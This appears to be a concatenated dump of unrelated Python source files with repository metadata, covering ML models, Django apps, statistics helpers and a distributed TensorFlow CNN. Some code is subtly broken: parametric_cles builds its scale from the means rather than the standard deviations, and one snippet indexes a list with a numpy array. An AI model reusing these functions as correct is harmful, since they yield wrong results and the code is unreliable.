os.path.join(benchmarks_path, 'memnist_10_100_4.tar') \ if self.filtering_benchmark is None \ else os.path.join(benchmarks_path, self.filtering_benchmark) self.clustering_benchmark = os.path.join(benchmarks_path, 'memnist_10_300_12.tar') \ if self.clustering_benchmark is None \ else os.path.join(benchmarks_path, self.clustering_benchmark) self.net = FilteringNetwork() self.train_metrics = ['ll', 'bcent'] self.test_metrics = ['ll', 'bcent'] def sample(self, B, N, K, **kwargs): dataset = ClusteredMultiEMNIST(train=False) batch = sample_idxs(dataset.idx_to_class, B, N, K, **kwargs) return dataset[batch] def build_train_loader(self): self.train_loader = get_train_loader(self.B, self.N, self.K, self.num_steps, rand_N=True, rand_K=True) def build_test_loader(self, filename=None): filename = self.filtering_benchmark if filename is None else filename self.test_loader = get_test_loader(filename) def gen_benchmarks(self, force=False): if not os.path.isfile(self.filtering_benchmark) or force: print('generating benchmark {}...'.format(self.filtering_benchmark)) idx_to_class = ClusteredMultiEMNIST(train=False).idx_to_class bench = [sample_idxs(idx_to_class, 10, 100, 4, rand_N=True, rand_K=True) \ for _ in range(100)] torch.save(bench, self.filtering_benchmark) print('generating benchmark {}...'.format(self.clustering_benchmark)) bench = [sample_idxs(idx_to_class, 10, 300, 12, rand_N=True, rand_K=True) \ for _ in range(100)] torch.save(bench, self.clustering_benchmark) def combine_digits(self, X): B, N, C, H, W = X.shape cX = torch.zeros(B, N, 1, 2*H, 2*W) cX[:,:,0,:H,:W] = X[:,:,0,:,:] cX[:,:,0,:H,W:] = X[:,:,1,:,:] cX[:,:,0,H:,:W] = X[:,:,2,:,:] return cX def plot_clustering(self, X, results): X = self.combine_digits(X)[0] labels = results['labels'][0] ulabels = torch.unique(labels) K = len(ulabels) fig, axes = plt.subplots(1, K, figsize=(50, 50)) for k, l in enumerate(ulabels): Xk = X[labels==l] Xk = Xk[: Xk.shape[0] - Xk.shape[0] % 4] I = to_numpy(make_grid(1-Xk, nrow=4, pad_value=0)).transpose(1, 2, 0) axes[k].set_title('cluster {}'.format(k+1), fontsize=100) axes[k].imshow(I) axes[k].axis('off') plt.tight_layout() def plot_filtering(self, batch): X = batch['X'].cuda() B, N, C, H, W = X.shape net = self.net net.eval() with torch.no_grad(): outputs = net(X, return_z=True) theta = outputs['theta'] theta_ = theta.repeat(1, N, 1).view(B*N, -1) labels = (outputs['logits'] > 0.0).long() # conditional generation z, _ = net.prior.sample(B*N, device='cuda', context=theta_) h_dec = net.dec(torch.cat([z, theta_], -1)) gX, _ = net.likel.sample(context=h_dec) gX = gX.view(B, N, C, H, W) z = outputs['z'] h_dec = net.dec(torch.cat([z, theta_], -1)) rX, _ = net.likel.sample(context=h_dec) rX = rX.view(B, N, C, H, W) fig, axes = plt.subplots(1, 2, figsize=(40, 40)) X = self.combine_digits(X)[0] labels = labels[0] X1 = X[labels==1] X1 = X1[: X1.shape[0] - X1.shape[0] % 8] I = to_numpy(make_grid(1-X1, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[0].imshow(I) axes[0].set_title('Filtered out images', fontsize=60, pad=20) axes[0].axis('off') X0 = X[labels==0] X0 = X0[: X0.shape[0] - X0.shape[0] % 8] I = to_numpy(make_grid(1-X0, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[1].imshow(I) axes[1].set_title('Remaining images', fontsize=60, pad=20) axes[1].axis('off') plt.tight_layout() #plt.savefig('figures/emnist_filtering.png', bbox_inches='tight') gX = self.combine_digits(gX)[0][:32] plt.figure() I = to_numpy(make_grid(1-gX, nrow=8, pad_value=0)).transpose(1, 2, 0) plt.imshow(I) plt.title('Generated images', fontsize=15, pad=5) plt.axis('off') #plt.savefig('figures/emnist_gen.png', bbox_inches='tight') fig, axes = plt.subplots(1, 2, figsize=(40, 40)) rX = self.combine_digits(rX)[0] X1 = rX[labels==1] X1 = X1[: X1.shape[0] - X1.shape[0] % 8] I = to_numpy(make_grid(1-X1, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[0].imshow(I) axes[0].set_title('Reconstructions of filtered out images', fontsize=60, pad=20) axes[0].axis('off') X0 = rX[labels==0] X0 = X0[: X0.shape[0] - X0.shape[0] % 8] I = to_numpy(make_grid(1-X0, nrow=8, pad_value=0)).transpose(1, 2, 0) axes[1].imshow(I) axes[1].set_title('Reconstructions of remaining images', fontsize=60, pad=20) axes[1].axis('off') plt.tight_layout() #plt.savefig('figures/emnist_recon.png', bbox_inches='tight') def load(args): add_args(args, sub_args) return Model(args)
1.96875
2
blog/urls.py
boost-entropy-repos-org/ojas
0
12769579
from django.conf.urls import url from django.urls import path,include from . import views from .feeds import LatestPostsFeed from .views import search, PostViewSet from rest_framework import routers from django.views.generic import TemplateView router = routers.DefaultRouter() router.register(r'api', PostViewSet) app_name = 'blog' urlpatterns = [ path('', views.most_viewed, name='most_viewed'), path('article/', views.post_list, name='post_list'), url(r'^tag/(?P<tag_slug>[-\w]+)/$', views.post_list, name='post_list_by_tag'), url(r'^blog/(?P<year>\d{4})-(?P<month>\d{2})-(?P<day>\d{2})/(?P<post>[-\w]+)/$', views.post_detail, name='post_detail'), path('feed/', LatestPostsFeed(), name='post_feed'), path('about/', views.about_page, name='about'), path('contact/', views.contact_page, name='contact_page'), url(r'^author/(?P<post_author>[-\w]+)/$',views.post_author, name='post_author'), path('search', search, name='search'), path('me/', views.me, name='me'), path('', include(router.urls)), path('api-auth/', include('rest_framework.urls')), path('offline/', views.offline, name='offline'), path('fill-dynamic-cache/<int:id>', views.fill_dynamic_cache, name='fill_dynamic_cache'), path('must-not-cache', views.must_not_cache, name='must_not_cache'), path( 'sw.js', views.ServiceWorkerView.as_view(), name=views.ServiceWorkerView.name, ), ]
1.328125
1
pycles/pycles.py
matthewkovacs/pycles
0
12769707
""" PyCLES Desc: This is an implementation of the Common Language Effect Size (CLES) in Python Author: <NAME> Date: 04/05/20 """ import numpy as np from scipy.stats import norm def nonparametric_cles(a, b, half_credit=True) -> float: """Nonparametric solver for the common language effect size. This solves for the probability that a random draw from `a` will be greater than a random draw from `b` using a brute force approach. If half_credit=True then equal values between vectors will be granted half points. e.g. nonparametric_cles([0, 1], [0, 0], True) >> 0.75 nonparametric_cles([0, 1], [0, 0], False) >> 0.5 nonparametric_cles([1, 1], [0, 0]) >> 1.0 nonparametric_cles([0, 0], [1, 1]) >> 0.0 """ m = np.subtract.outer(a, b) m = np.sign(m) if half_credit: m = np.where(m == 0, 0.5, m) m = np.where(m == -1, 0, m) return np.mean(m) def parametric_cles(a, b): """Parametric solver for the common language effect size. This function assumes that your data is normally distributed. It returns the probability that a random draw from `a` will be greater than a random draw from `b` using the normal cumulative distribution function.""" ma, mb = np.mean(a), np.mean(b) sd = np.sqrt(ma**2 + mb**2) return norm.cdf(x=0, loc=mb-ma, scale=sd)
2.828125
3
site_config/migrations/0015_auto_20171107_1326.py
LaudateCorpus1/apostello
69
12769835
# -*- coding: utf-8 -*- # Generated by Django 1.11.7 on 2017-11-07 13:26 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [("site_config", "0014_auto_20171025_1053")] operations = [ migrations.AlterField( model_name="siteconfiguration", name="email_from", field=models.EmailField( blank=True, help_text="Email will be sent from this address.", max_length=254, null=True ), ), migrations.AlterField( model_name="siteconfiguration", name="email_host", field=models.CharField(blank=True, help_text="Email host.", max_length=255, null=True), ), migrations.AlterField( model_name="siteconfiguration", name="email_password", field=models.CharField(blank=True, help_text="Email password.", max_length=255, null=True), ), migrations.AlterField( model_name="siteconfiguration", name="email_port", field=models.PositiveIntegerField(blank=True, help_text="Email host port.", null=True), ), migrations.AlterField( model_name="siteconfiguration", name="email_username", field=models.CharField(blank=True, help_text="Email user name.", max_length=255, null=True), ), ]
0.972656
1
tasks/task_viper/temp.py
chenyanghungry/person-reid-lib
81
12769963
<gh_stars>10-100 import numpy as np a = [53, 13, 84, 32, 1] b = np.random.choice(len(a), 3, True) print(a[b])
1.53125
2
issue_order/migrations/0015_auto_20180823_2108.py
jiejiang/courier
0
12770091
# -*- coding: utf-8 -*- # Generated by Django 1.10.8 on 2018-08-23 20:08 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('issue_order', '0014_auto_20180819_2108'), ] operations = [ migrations.CreateModel( name='Route', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('system', models.CharField(choices=[('jixun', '\u5409\u8bafCC\u7ebf'), ('postal', '\u90ae\u653fBC\u7ebf'), ('yunda', '\u97f5\u8fbeCC\u7ebf')], db_index=True, max_length=32)), ('code', models.CharField(db_index=True, max_length=64)), ('name', models.CharField(max_length=64)), ], ), migrations.RemoveField( model_name='courierorder', name='system', ), migrations.AddField( model_name='courierorder', name='route', field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.PROTECT, to='issue_order.Route'), preserve_default=False, ), ]
0.949219
1
source/import_sql.py
ykjason/MSFlames
0
12770219
import sqlite3 if __name__ == '__main__': SQL_FILE_NAME = "main_solo_vals_flame_advantaged.sql" DB_FILE_NAME = "solo_values_FA.db" connection = sqlite3.connect(DB_FILE_NAME) cursor = connection.cursor() file = open(SQL_FILE_NAME) read_file = file.read() cursor.executescript(read_file) connection.close()
1.140625
1
app/models.py
awesome-archive/susnote
0
12770347
#!/usr/bin/env python # encoding: utf-8 from peewee import * from playhouse.postgres_ext import * import datetime class BaseModel(Model): id = PrimaryKeyField() create_time = DateTimeField(verbose_name='create_time', constraints=[SQL('DEFAULT CURRENT_TIMESTAMP')]) class Notebook(BaseModel): name = CharField(max_length=128) author_id = IntegerField(default='0') class Meta: db_table = 'notebook' class Article(BaseModel): title = CharField(max_length=128) content = TextField(verbose_name='content') author_id = IntegerField(default='0') notebook_id = IntegerField(default='0') source = CharField(max_length=128) class Meta: db_table = 'article' class Article_History(BaseModel): title = CharField(max_length=128) content = TextField(verbose_name='content') author_id = IntegerField(default='0') article_id = IntegerField(default='0') class Meta: db_table = 'article_history' class Author(BaseModel): nickname = CharField(max_length=128) password = CharField(max_length=128) password_salt = CharField(max_length=128) username = CharField(max_length=128) class Meta: db_table = 'author' class Image(BaseModel): path = CharField(max_length=128) title = CharField(max_length=128) article_id = IntegerField(default='0') size = CharField(max_length=128) related_id = IntegerField(default='0') author_id = IntegerField(default='0') type = CharField(max_length=128) class Meta: db_table = 'image' class RSS_Source(BaseModel): url = CharField(max_length=128) title = CharField(max_length=128) update_time = DateTimeField(verbose_name='create_time', default=datetime.datetime.now) rss_category_id = IntegerField(default=0) class Meta: db_table = 'rss_source' class RSS_Flow(BaseModel): url = CharField(max_length=128) title = CharField(max_length=128) author = CharField(max_length=128) is_readed = BooleanField(default=False) content = TextField(verbose_name='content') source_id = IntegerField(default='0') class Meta: db_table = 'rss_flow' class RSS_Category(BaseModel): title = CharField(max_length=128) class Meta: db_table = 'rss_category'
1.59375
2
client2.py
pabitra0177/ITR-internship
0
12770475
<reponame>pabitra0177/ITR-internship import socket import time # ? HOW to check the connection does exist # ? How to unbind # ? socket.error: [Errno 111] Connection refused s=socket.socket() host='127.0.0.1' port=1121 while s.connect((host,port)): print s.recv(1024) time.sleep(0.5)
1.40625
1
process_run_chicago.py
Multiscale-Genomics/C-HiC
0
12770603
#!/usr/bin/env python """ .. See the NOTICE file distributed with this work for additional information regarding copyright ownership. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from __future__ import print_function import argparse from basic_modules.workflow import Workflow from utils import logger from CHiC.tool.run_chicago import ChicagoTool ################################################# class process_run_chicago(Workflow): """ Function for processing capture Hi-C fastq files. Files are aligned, filtered and analysed for Cpature Hi-C peaks """ def __init__(self, configuration=None): """ initiate the class Parameters: ----------- Configuration: dict dictinoary with parameters for different tools, indicating how to run each of them """ logger.info("Initiating process_runChicago") if configuration is None: configuration = {} self.configuration.update(configuration) def run(self, input_files, metadata, output_files): """ This main function that run the chicago pipeline with runChicago.R wrapper Parameters ---------- input_files: dict location with the .chinput files. chinput_file: str in case there is one input file chinput_file: comma separated list in case there is more than one input file. metadata: dict Input metadata, str output: dict output file locations Returns ------- output_files : dict Folder location with the output files output_metadata: dict Output metadata for the associated files in output_files """ try: chicago_caller = ChicagoTool(self.configuration) output_files_generated, output_metadata = chicago_caller.run( input_files, metadata, output_files) return output_files_generated, output_metadata except IOError: logger.info("chicago failed to generate output files =(") ################################################################ def main_json(config, in_metadata, out_metadata): """ Alternative main function This function launches the app using configuration written in two json files: config.json and metadata.json """ # 1. Instantiate and launch the App print("1. Instantiate and launch the App") from apps.jsonapp import JSONApp app = JSONApp() results = app.launch(process_run_chicago, config, in_metadata, out_metadata) # 2. The App has finished print("2. Execution finished; see " + out_metadata) print(results) return results ############################################################### if __name__ == "__main__": #set up the command line parameters PARSER = argparse.ArgumentParser( description="Chicago algorithm for capture Hi-C peak detection") PARSER.add_argument("--config", help="Configuration file") PARSER.add_argument( "--in_metadata", help="Location of metadata file") PARSER.add_argument( "--out_metadata", help="Location of output metadata file") PARSER.add_argument( "--local", action="store_const", const=True, default=False) #Get matching parameters from the command line ARGS = PARSER.parse_args() CONFIG = ARGS.config IN_METADATA = ARGS.in_metadata OUT_METADATA = ARGS.out_metadata LOCAL = ARGS.local if LOCAL: import sys sys._run_from_cmdl = True # pylint: disable=protected-access RESULTS = main_json(CONFIG, IN_METADATA, OUT_METADATA) print(RESULTS)
1.507813
2
automlk/doc.py
pierre-chaville/automlk
16
12770731
import os import sys import glob import zipfile import pandas as pd import numpy as np from .context import get_dataset_folder from .results import * from automlk.worker import get_search_rounds from .print import * import jinja2 import subprocess jinja_globals = {'print_list': print_list, 'print_score': print_score, 'print_score_std': print_score_std, 'print_value': print_value, 'print_duration': print_duration, 'print_params': print_params, 'print_other_metrics': print_other_metrics, 'print_title': print_title, } def render(template, fileout, **kwargs): """ generates output from template into the fileout file :param template: jinja2 template to be used (in folder /template) :param fileout: file to store the results :param kwargs: args to render the template :return: """ t = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath="../automlk/templates/")).get_template(template) with open(fileout, 'w') as f: f.write(t.render({**kwargs, **jinja_globals})) def gener_doc(dataset): """ generate the documentation of this dataset :param dataset: dataset object :return: """ # check or create doc folder folder = get_dataset_folder(dataset.dataset_id) + '/docs' if not os.path.exists(folder): os.makedirs(folder) os.makedirs(folder + '/_build') os.makedirs(folder + '/_static') os.makedirs(folder + '/_templates') # generate conf.py render('conf.txt', folder + '/conf.py', dataset=dataset) render('make.bat', folder + '/make.bat', dataset=dataset) render('makefile.txt', folder + '/Makefile', dataset=dataset) # generate index render('index.rst', folder + '/index.rst', dataset=dataset) # dataset data and features search = get_search_rounds(dataset.dataset_id) if len(search) > 0: best = get_best_models(dataset.dataset_id) best_pp = get_best_pp(dataset.dataset_id) # separate models (level 0) from ensembles (level 1) best1 = [b for b in best if b['level'] == 1] best2 = [b for b in best if b['level'] == 2] print(len(best1), len(best2)) print(best1[:2]) render('dataset.rst', folder + '/dataset.rst', dataset=dataset, best1=best1, best2=best2, best_pp=best_pp, n_searches1=len(search[search.level == 1]), n_searches2=len(search[search.level == 2])) # then for the best rounds N_ROUNDS = 5 for round_id in list([b['round_id'] for b in best1[:N_ROUNDS]]) + list([b['round_id'] for b in best2[:N_ROUNDS]]): round = search[search.round_id == int(round_id)].to_dict(orient='records')[0] pipeline = [s for s in round['pipeline'] if s[0] not in ['NO-SCALE', 'PASS']] params = get_round_params(search, round_id) features = get_feature_importance(dataset.dataset_id, round_id) render('round.rst', folder + '/round_%s.rst' % round_id, dataset=dataset, round=round, pipeline=pipeline, features=features, params=params, cols=params.keys()) else: # return render_template('dataset.html', dataset=dataset, n_searches1=0) render('dataset.rst', folder + '/dataset.rst', dataset=dataset, n_searches1=0) # then generate html and pdf with make if sys.platform == 'linux': subprocess.call(['sh', '../scripts/gen_doc.sh', os.path.abspath(get_dataset_folder(dataset.dataset_id)+'/docs')]) else: os.system('call ../scripts/gen_doc ' + os.path.abspath(get_dataset_folder(dataset.dataset_id)+'/docs')) # generate zip file of the html site with zipfile.ZipFile(get_dataset_folder(dataset.dataset_id) + '/doc.zip', 'w') as z: root = get_dataset_folder(dataset.dataset_id) + '/docs/_build/html/' for dir in ['', '_static/', '_images/', '_sources/']: for f in glob.glob(root + dir + '*.*'): z.write(f, dataset.dataset_id + '/' + dir + os.path.basename(f))
1.453125
1
discern/mmd/mmd.py
imsb-uke/discern
0
12770859
<filename>discern/mmd/mmd.py """Module to select the mmd loss function.""" import logging from typing import Tuple import numpy as np _LOGGER = logging.getLogger(__name__) try: # pragma: no cover from discern.mmd._mmd import _mmd_loop as _mmd_loop_c USE_C_IMPLEMENTATION = True except (ImportError, ModuleNotFoundError): # pragma: no cover _LOGGER.warning("Fallback to Python version, MMD computation may be slow") USE_C_IMPLEMENTATION = False else: # pragma: no cover _LOGGER.debug("Using cython version of MMD") def _mmd_loop_py(dist_xy, dist_xx, dist_yy, scales, sigma): # pylint: disable=too-many-locals stat = np.zeros_like(scales) n_x = np.float(dist_xx.shape[0]) n_y = np.float(dist_yy.shape[0]) for i, k in enumerate(scales): val = k * sigma k_xx = np.exp(-dist_xx / (2 * val)) np.fill_diagonal(k_xx, 0.0) k_xxnd = np.sum(k_xx) / (n_x * n_x - n_x) k_yy = np.exp(-dist_yy / (2 * val)) np.fill_diagonal(k_yy, 0.0) k_yynd = np.sum(k_yy) / (n_y * n_y - n_y) res1 = k_xxnd + k_yynd res2 = np.exp(-dist_xy / (2 * val)) res2 = np.sum(res2) * 2. / (n_x * n_y) stat[i] = res1 - res2 return np.max(stat) if USE_C_IMPLEMENTATION: # pragma: no cover _mmd_loop = _mmd_loop_c # pylint: disable=invalid-name else: # pragma: no cover _mmd_loop = _mmd_loop_py # pylint: disable=invalid-name def _calculate_distances( x: np.ndarray, y: np.ndarray) -> Tuple[np.ndarray, np.ndarray, np.ndarray]: """Calculate euclidean distances. Faster implementation than calling sklearn.metrics.pairwise.euclidean_distance three times, but without multiprocessing. Args: x (np.ndarray): First array y (np.ndarray): Second array Returns: Tuple[np.ndarray, np.ndarray, np.ndarray]: Euclidian distance between x-y, x-x and y-y. """ # pylint: disable=invalid-name dot_x = np.einsum('ij,ij->i', x, x)[:, np.newaxis] dot_y = np.einsum('ij,ij->i', y, y)[np.newaxis, :] dist_xy = np.matmul(x, y.T) dist_xx = np.matmul(x, x.T) dist_yy = np.matmul(y, y.T) np.multiply(dist_xy, -2., out=dist_xy) np.multiply(dist_xx, -2., out=dist_xx) np.multiply(dist_yy, -2., out=dist_yy) np.add(dist_xy, dot_x, out=dist_xy) np.add(dist_xy, dot_y, out=dist_xy) np.add(dist_xx, dot_x, out=dist_xx) np.add(dist_xx, dot_x.T, out=dist_xx) np.add(dist_yy, dot_y.T, out=dist_yy) np.add(dist_yy, dot_y, out=dist_yy) np.fill_diagonal(dist_xx, 0.) np.fill_diagonal(dist_yy, 0.) return dist_xy, dist_xx, dist_yy def mmd_loss(random_cells: np.ndarray, valid_cells: np.ndarray, sigma: float) -> float: """Compute mmd loss between random cells and valid cells. Args: random_cells (np.ndarray): Random generated cells. valid_cells (np.ndarray): Valid (decoded) cells. sigma (float): Precalculated Sigma value. Returns: float: MMD loss between random and valid cells. """ # pylint: disable=too-many-locals random_cells = random_cells.astype(np.float32) valid_cells = valid_cells.astype(np.float32) dist_xy, dist_xx, dist_yy = _calculate_distances(random_cells, valid_cells) scales = np.linspace(0.8, 1.5, num=23, dtype=np.float32) sigma = np.float32(sigma) return _mmd_loop(dist_xy, dist_xx, dist_yy, scales, sigma)
1.398438
1
Python/main.py
minjibyeongho/KOSA-Pytorch
2
12770987
#https://docs.python.org/ko/3/library/__main__.html #main.py #from module import * import module if __name__ == "__main__": print(__name__) #hello() module.hello()
1.023438
1
sys_simulator/general/actions_discretizations.py
lbaiao/sys-simulator-2
1
12771115
<reponame>lbaiao/sys-simulator-2 import numpy as np def db_five(min_value: float, max_value: float): a_max = max_value - 10 aux = np.linspace(a_max-30, a_max, 4) actions = [min_value, *aux] return actions def db_six(min_value: float, max_value: float): a_max = max_value - 10 aux = np.linspace(a_max-40, a_max, 5) a_min = min_value if min_value < max_value-40 else -90 actions = [a_min, *aux] return actions def db_ten(min_value: float, max_value: float): aux = [max_value/2, max_value] aux2 = np.linspace(max_value-60, max_value-10, 7) a_min = min_value if min_value < max_value-40 else -90 actions = [a_min, *aux2, *aux] return actions def db_20(): a1 = np.linspace(-60, -20, 10) a2 = np.linspace(-14, 0, 9) actions = [-90, *a1, *a2] return actions def db_30(): a0 = np.linspace(-90, -64, 10) a1 = np.linspace(-60, -20, 10) a2 = np.linspace(-14, 0, 10) actions = [*a0, *a1, *a2] return actions
2.421875
2
myapps/jupyter/TensorFlow/Distributed/distributed_cnn.py
alonsoir/pipeline
1
12771243
<gh_stars>1-10 import tensorflow as tf import numpy as np # Modules required for file download and extraction import os import sys import tarfile from six.moves.urllib.request import urlretrieve from scipy import ndimage outdir = '/tmp/pipeline/datasets/notmist/' def maybe_download(filename, url, force=False): """Download a file if not present.""" if force or not os.path.exists(outdir + filename): filename, _ = urlretrieve(url + filename, outdir + filename) print('\nDownload complete for {}'.format(filename)) else: print('File {} already present.'.format(filename)) print(filename) return outdir + filename def maybe_extract(filename, force=False): root = os.path.splitext(os.path.splitext(filename)[0])[0] # remove .tar.gz if os.path.isdir(root) and not force: # You may override by setting force=True. print('{} already present - don\'t need to extract {}.'.format(root, filename)) else: print('Extracting data for {}. This may take a while. Please wait.'.format(root)) print(filename) tar = tarfile.open(filename) sys.stdout.flush() tar.extractall(root[0:root.rfind('/') + 1]) tar.close() data_folders = [ os.path.join(root, d) for d in sorted(os.listdir(root)) if os.path.isdir(os.path.join(root, d))] print(data_folders) return data_folders # Locations to download data: url = 'http://yaroslavvb.com/upload/notMNIST/' # Download two datasets train_zip_path = maybe_download('notMNIST_small.tar.gz', url) # Extract datasets train_folders = maybe_extract(train_zip_path) image_height = 28 # Pixel height of images image_width = 28 # Pixel width of images pixel_depth = 255.0 # Number of levels per pixel expected_img_shape = (image_height, image_width) # Black and white image, no 3rd dimension num_labels = len(train_folders) def load_image_folder(folder): """Load the data for a single image label.""" # Create a list of image paths inside the folder image_files = os.listdir(folder) # Create empty numpy array to hold data dataset = np.ndarray(shape=(len(image_files), image_height, image_width), dtype=np.float32) num_images = 0 # Counter for number of successful images loaded for image in image_files: image_file = os.path.join(folder, image) try: # Read in image pixel data as floating point values image_data = ndimage.imread(image_file).astype(float) # Scale values: [0.0, 255.0] => [-1.0, 1.0] image_data = (image_data - pixel_depth / 2) / (pixel_depth / 2) if image_data.shape != expected_img_shape: print('File {} has unexpected dimensions: '.format(str(image_data.shape))) continue # Add image to the numpy array dataset dataset[num_images, :, :] = image_data num_images = num_images + 1 except IOError as e: print('Could not read:', image_file, ':', e, '- skipping this file and moving on.') # Trim dataset to remove unused space dataset = dataset[0:num_images, :, :] return dataset def make_data_label_arrays(num_rows, image_height, image_width): """ Creates and returns empty numpy arrays for input data and labels """ if num_rows: dataset = np.ndarray((num_rows, image_height, image_width), dtype=np.float32) labels = np.ndarray(num_rows, dtype=np.int32) else: dataset, labels = None, None return dataset, labels def collect_datasets(data_folders): datasets = [] total_images = 0 for label, data_folder in enumerate(data_folders): # Bring all test folder images in as numpy arrays dataset = load_image_folder(data_folder) num_images = len(dataset) total_images += num_images datasets.append((dataset, label, num_images)) return datasets, total_images def merge_train_test_datasets(datasets, total_images, percent_test): num_train = total_images * (1.0 - percent_test) num_test = total_images * percent_test train_dataset, train_labels = make_data_label_arrays(num_train, image_height, image_width) test_dataset, test_labels = make_data_label_arrays(num_test, image_height, image_width) train_counter = 0 test_counter = 0 dataset_counter = 1 for dataset, label, num_images in datasets: np.random.shuffle(dataset) if dataset_counter != len(datasets): n_v = num_images // (1.0 / percent_test) n_t = num_images - n_v else: # Last label, make sure dataset sizes match up to what we created n_v = len(test_dataset) - test_counter n_t = len(train_dataset) - train_counter train_dataset[train_counter: train_counter + n_t] = dataset[:n_t] train_labels[train_counter: train_counter + n_t] = label test_dataset[test_counter: test_counter + n_v] = dataset[n_t: n_t + n_v] test_labels[test_counter: test_counter + n_v] = label train_counter += n_t test_counter += n_v dataset_counter += 1 return train_dataset, train_labels, test_dataset, test_labels train_test_datasets, train_test_total_images = collect_datasets(train_folders) train_dataset, train_labels, test_dataset, test_labels = \ merge_train_test_datasets(train_test_datasets, train_test_total_images, 0.1) # Convert data examples into 3-D tensors num_channels = 1 # grayscale def reformat(dataset, labels): dataset = dataset.reshape( (-1, image_height, image_width, num_channels)).astype(np.float32) labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32) return dataset, labels train_dataset, train_labels = reformat(train_dataset, train_labels) test_dataset, test_labels = reformat(test_dataset, test_labels) print('Training set', train_dataset.shape, train_labels.shape) print('Test set', test_dataset.shape, test_labels.shape) def shuffle_data_with_labels(dataset, labels): indices = range(len(dataset)) np.random.shuffle(indices) new_data = np.ndarray(dataset.shape, dataset.dtype) new_labels = np.ndarray(labels.shape, dataset.dtype) n = 0 for i in indices: new_data[n] = dataset[i] new_labels[n] = labels[i] n += 1 return new_data, new_labels train_dataset, train_labels = shuffle_data_with_labels(train_dataset, train_labels) CLUSTER_SPEC= """ { 'ps' : ['tensorflow0.pipeline.io:8888', 'tensorflow1.pipeline.io:8888'], 'worker' : ['tensorflow2.pipeline.io:8888','tensorflow3.pipeline.io:8888'], } """ import ast cluster_spec = ast.literal_eval(CLUSTER_SPEC) spec = tf.train.ClusterSpec(cluster_spec) workers = ['/job:worker/task:{}'.format(i) for i in range(len(cluster_spec['worker']))] param_servers = ['/job:ps/task:{}'.format(i) for i in range(len(cluster_spec['ps']))] sess_config = tf.ConfigProto( allow_soft_placement=True, log_device_placement=True) graph = tf.Graph() print_versions = [] with graph.as_default(): for worker in workers: with tf.device(worker): version = tf.Print(["active"], ["version"], message="worker is ") print_versions.append(version) target = "grpc://tensorflow0.pipeline.io:8888" with tf.Session(target, graph=graph, config=sess_config) as session: print(session.run(print_versions)) patch_size = 5 depth = 16 num_hidden = 64 def variable_summaries(var, name): with tf.name_scope("summaries"): mean = tf.reduce_mean(var) tf.scalar_summary('mean/' + name, mean) with tf.name_scope('stddev'): stddev = tf.sqrt(tf.reduce_sum(tf.square(var - mean))) tf.scalar_summary('sttdev/' + name, stddev) tf.scalar_summary('max/' + name, tf.reduce_max(var)) tf.scalar_summary('min/' + name, tf.reduce_min(var)) tf.histogram_summary(name, var) def weight_variable(shape, name): return tf.Variable(tf.truncated_normal( shape, stddev=0.1), name=name) def bias_variable(shape, name): return tf.Variable(tf.constant(0.1, shape=shape), name=name) def conv2D(data, W, b): conv = tf.nn.conv2d(data, W, [1, 2, 2, 1], padding='SAME', name="2DConvolution") return tf.nn.relu(conv + b, name="ReLu") def fc(data, W, b): shape = data.get_shape().as_list() reshape = tf.reshape(data, [-1, shape[1] * shape[2] * shape[3]]) return tf.nn.relu(tf.nn.xw_plus_b(reshape, W, b), name="ReLu") def model(data): with tf.name_scope("Layer1"): activations = conv2D(data, layer1_weights, layer1_biases) dropped = tf.nn.dropout(activations, 0.5, name="Dropout") with tf.name_scope("Layer2"): activations = conv2D(dropped, layer2_weights, layer2_biases) dropped = tf.nn.dropout(activations, 0.5, name="Dropout") with tf.name_scope("Layer3"): activations = fc(dropped, layer3_weights, layer3_biases) return tf.matmul(activations, layer4_weights) + layer4_biases graph = tf.Graph() # divide the input across the cluster: reduce_loss = [] with graph.as_default(): device_setter = tf.train.replica_device_setter(cluster=cluster_spec) with tf.device(device_setter): global_step = tf.Variable(0, name="global_step", trainable=False) # Input data. input_data = tf.placeholder( tf.float32, shape=(None, image_height, image_width, num_channels), name="input_data") input_labels = tf.placeholder(tf.float32, shape=(None, num_labels), name="input_labels") layer1_weights = weight_variable([patch_size, patch_size, num_channels, depth], "L1Weights") layer1_biases = bias_variable([depth], "L1Bias") layer2_weights = weight_variable([patch_size, patch_size, depth, depth], "L2Weights") layer2_biases = bias_variable([depth], "L2Bias") layer3_weights = weight_variable([image_height // 4 * image_width // 4 * depth, num_hidden], "L3Weights") layer3_biases = bias_variable([num_hidden], "L3Bias") layer4_weights = weight_variable([num_hidden, num_labels], "L4Weights") layer4_biases = bias_variable([num_labels], "L4Bias") splitted = tf.split(0, len(workers), input_data) label_splitted = tf.split(0, len(workers), input_labels) # Add variable summaries for v in [layer1_weights, layer2_weights, layer3_weights, layer4_weights, layer1_biases, layer2_biases, layer3_biases, layer4_biases]: variable_summaries(v, v.name) for idx, (portion, worker, label_portion) in enumerate(zip(splitted, workers, label_splitted)): with tf.device(worker): # Training computation. local_reduce = tf.Print(portion, ["portion"], message="portion is") logits = model(portion) loss = tf.nn.softmax_cross_entropy_with_logits(logits, label_portion) loss = tf.Print(loss, [tf.reduce_sum(loss), global_step], message="loss, global_step = ") reduce_loss.append(loss) with tf.device(device_setter): # Optimizer. mean_loss = tf.reduce_mean(tf.pack(reduce_loss)) optimizer = tf.train.RMSPropOptimizer(0.01).minimize(mean_loss, global_step=global_step) init = tf.initialize_all_variables() # Predictions for the training and test data. model_prediction = tf.nn.softmax(logits, name="prediction") label_prediction = tf.argmax(model_prediction, 1, name="predicted_label") with tf.name_scope('summaries'): tf.scalar_summary('loss', mean_loss) with tf.name_scope('accuracy'): correct_prediction = tf.equal(label_prediction, tf.argmax(label_portion, 1)) model_accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32)) 